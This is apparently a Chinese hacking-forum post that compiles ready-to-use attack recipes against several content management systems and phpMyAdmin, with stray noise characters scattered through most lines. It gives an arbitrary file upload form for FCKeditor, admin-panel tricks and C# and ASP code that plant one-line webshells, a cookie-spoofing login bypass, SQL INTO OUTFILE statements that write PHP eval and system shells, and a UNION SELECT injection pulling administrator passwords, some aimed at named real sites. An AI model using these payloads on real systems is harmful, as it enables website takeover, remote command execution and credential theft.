http://xxoo.com/controls/fckedit ... aspx/connector.aspx
) q; s; V/ R8 t6 [' l3 J0 C跳转到网站根目录上传任意文件。
, C6 Y1 J3 Z' Z \如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
" ]" D; B+ T. d<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">$ |' q' l9 ^( h/ R2 n/ F
Upload a new file:<br>
( x4 k) T5 L2 M7 W& d<input type="file" name="NewFile" size="50"><br>" p {. N+ K; A
<input id="btnUpload" type="submit" value="Upload">
2 a6 p2 L, x" D. |" m- f% L, _7 L</form>
' {* u0 ?0 R/ o$ i! [0 ?* ]: \/ C; m-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 N6 Q+ w( r6 T0 ~/ h' {) m4 x
" ^6 @7 d3 s: G; L% HSDcms 后台拿webshell3 ^2 }7 Y/ B4 ~: Z: E8 _
0 \ Z# J; x/ ?! r
第一种方法:/ w4 D K" z- @
进入后台-->系统管理-->系统设置-->系统设置->网站名称;% M6 `6 Z: E+ f! l, e- T! [: Z- B% t
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
9 ^6 b' P* i l/ U' E# B+ p5 B8 O! M用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。4 {+ ]* R d+ ], N
第二种方法:( @! z3 D" L- ?" Z2 u, A
进入后台-->系统管理-->系统设置-->系统设置->上传设置;* H8 ]- W/ x0 a* k8 l
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!1 ]) t# h" `' T$ P" ^. z8 j/ m3 J
第三种方法:
# I! i2 @( ~$ y& `3 ~进入后台-->界面管理-->模板文件管理-->创建文件* f O z n) z" i; n% }( u) k! U6 Y
文件名写入getshell.ashx0 W, Y! ?" M/ z
内容写入下面内容:2 D: c2 I' Y* {1 A* E- m# n4 d0 f9 J6 T6 a
/====================复制下面的=========================/# e0 \, g* I1 g8 h" l$ U
<%@ WebHandler Language="C#" Class="Handler" %>
0 R5 q5 Q+ V6 N3 l. o' wusing System;( f8 i% S4 N+ f/ X. R
using System.Web;% D# U# O- l4 P G5 P [' L
using System.IO;
' z4 F' Q2 T- w+ Q4 g T) ppublic class Handler : IHttpHandler {
1 ]" R* J( E. Z9 k2 O$ i2 q$ @) {public void ProcessRequest (HttpContext context) {, K! ]- c& d7 n( k8 r6 d' H
context.Response.ContentType = "text/plain";
6 e- d4 \4 f8 z+ B1 H) t% WStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
; N8 I& Q1 y) zfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
) _5 @' k3 i% p' J: A" Qfile1.Flush();
2 }5 r# T9 r) u- O2 j9 Mfile1.Close();% G+ Z C; [( n+ v5 [: U
}
9 ]5 K9 ^* [0 V# @# v# Dpublic bool IsReusable {
) ~: ^/ E: C5 Sget {5 @; M& U% `. ? E1 i& v
return false;
. ` ^8 w( D# A}2 D, Y) o! v- b5 B
}
2 G5 j6 f& t# o. v% K' J6 V}
3 Z0 s# G1 n. g h/=============================================/7 W+ y! i4 @7 Y) N4 a h5 ~' U9 v
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
+ D0 a# `4 y3 u8 G会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接: D* H$ a" t! B8 k- d
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ E/ r% U/ \ J8 p& a
" O! @ P5 |& w& Y1 ~
ESCMS网站管理系统0day# O/ G' t0 m$ A: _. Q9 U
6 U, n8 q% z1 [3 M后台登陆验证是通过admin/check.asp实现的
! w) L( u3 O3 i1 y$ b
4 Z6 R' ^0 S1 \1 \首先我们打开http://target.com/admin/es_index.html: m! ~/ S# H5 w% M3 i" x4 [, c
然后在COOKIE结尾加上" `7 n; Z& l6 Q
; ESCMS$_SP2=ES_admin=st0p;, @: J( V* g' _0 s$ W2 ?1 q' o5 n
修改,然后刷新8 i5 V& {: h/ c- m$ l/ ?
进后台了嘎..0 `+ G0 S$ F! i9 `$ |
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL9 O4 y+ K1 ~0 x/ q$ t3 A& |% k
4 N* t, }+ D3 I! g利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.! s+ x1 {/ D/ A; G6 u
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
! l7 a2 s# y, Z) _( Z存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
4 j0 G9 m+ ]1 C" | P% s* _在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
( N1 m& k _+ e! q4 ~------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 w2 J6 M, V, G5 J0 i0 x" o1 N/ U1 s' _' t2 n
宁志网站管理系统后台无验证漏洞及修复, ?( \( h4 W1 A2 Z. I
4 f5 ~8 \( ^0 }9 P1 P! N5 h% w5 U网上搜了一下,好像没有发布.如有雷同纯粹巧合!7 {. Z; J) r) t! `( n3 k0 O4 h& @- E
官方网站:www.ningzhi.net. z/ ~3 E V0 L
学校网站管理系统 V.2011版本 " }1 {- G* J3 k& H$ g$ e1 Z
http://down.chinaz.com/soft/29943.htm
W: u' n) V' w% U( v其它版本(如:政府版等),自行下载.; M; `+ R5 z1 N5 x% X" q
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
$ |! S# I5 z" V$ D0 C1 g4 Wlogin.asp代码如下:
% k6 p( U9 g1 {- i. |+ S9 |* G<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 5 @( R! @8 c- f: p+ x/ F8 g
manage.asp代码我就不帖出来了.反正也没验证.$ A1 b. Q2 }2 W0 e: R7 \' K
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!9 q. J3 P. d/ _4 j' m2 z8 K
漏洞利用:
, S& F; d% g- Q" ~8 K# a% V+ R- F直接访问http://www.0855.tv/admin/manage.asp; u& |6 U i0 G9 I
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
/ ^# s& ^& R6 R% B----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ [- k2 H& x5 F9 z0 B+ t
& M3 A$ ?: W1 h8 ]& k, E! ^
phpmyadmin拿shell的四种方法总结及修复
, e: h4 d3 ~7 U4 \4 h: G
7 u" O7 h9 g3 j/ U! F( b方法一:
2 h& j. ?; t' z5 r2 J, b. x+ J2 fCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );* H! T% x2 X2 O$ W7 Y8 }
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
3 |7 u0 E) |8 Y: p! uSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';# J5 l- F5 F% _ g
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
! ?+ d- H* |( [, j* O' }$ P2 t 一句话连接密码:7on4 ^0 z# J1 i7 }; e! y
方法二:
- y- R6 d+ f5 X& x" v3 ? d p5 j读取文件内容: select load_file('E:/xamp/www/s.php');
/ s3 k, ^0 N" g% Z8 Z, |- g写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'/ r+ D! z, ^# {2 ? @
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'7 ?6 t' F1 v/ @
方法三:3 B: M, o7 _& e
JhackJ版本 PHPmyadmin拿shell5 J3 _/ Y4 {: @0 a, B
Create TABLE study (cmd text NOT NULL);+ f, P& s @" Z+ ], e
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
+ B$ [1 v- b9 m7 l! N; Rselect cmd from study into outfile 'E:/wamp/www/7.php';% W, g2 Q* e! w
Drop TABLE IF EXISTS study;# S8 b/ F8 M8 f& g: Z
<?php eval($_POST[cmd])?>0 B% J9 |# F1 f( b4 b
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
+ g5 l! S5 A+ P9 c0 U uINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
4 F+ V! m4 I+ y6 W0 rSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1; Z. {$ R6 f/ K1 h" U- t# U
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。. o" ?! y+ [1 b9 [3 q! h
方法四:. s m2 o; q# q+ B
select load_file('E:/xamp/www/study.php');0 }+ ^. b. ]* l, V3 i: e$ t
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
- `8 c% i( W! ?然后访问网站目录:http://www.2cto.com/study.php?cmd=dir0 i% U# V: V- `: I7 e# y# ]
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ A5 R& w. y+ Q2 D1 ~3 M8 t7 A; X. y1 _
NO.001中学网站管理系统 Build 110628 注入漏洞' u* I0 c( ^5 y" P
2 a* k/ x( {' ?( n3 m0 V$ c
NO.001中学网站管理系统功能模块:% e" a2 l0 X7 S1 q5 c f
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等# Z" U5 [8 W+ ]9 I% I+ m, M
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息( R: I D/ F3 C5 k8 J( N
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
3 ?9 G9 E" {' ]$ d% ]4.视频图片管理:一级分类,动态添加视频或者图片等信息4 c5 v/ }1 K+ k8 B& x% b) p" a- B, m
5.留言管理:对留言,修改,删除、回复等管理
# M- x7 R- }$ j6.校友频道:包括校友资料excel导出、管理等功能
& @4 l( I! b6 N! y7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页+ v7 s$ M- B, c
默认后台:admin/login.asp+ X* X/ P: e9 t2 h( n2 C4 v3 T' ?9 Y1 X6 w
官方演示:http://demo.001cms.net% ^+ \$ f' }7 P$ J
源码下载地址:http://down.chinaz.com/soft/30187.htm
+ o/ ~& i, O kEXP:9 _2 K! I- s6 q) r0 n
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin8 i! b( g! U7 P
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin2 Z& h* [3 I7 K& Z( e
getshell:后台有备份,你懂的
) v( E$ C' S7 t' e3 `) v2 Q9 a另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
' k5 ~7 l1 ]$ p! K/ o------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对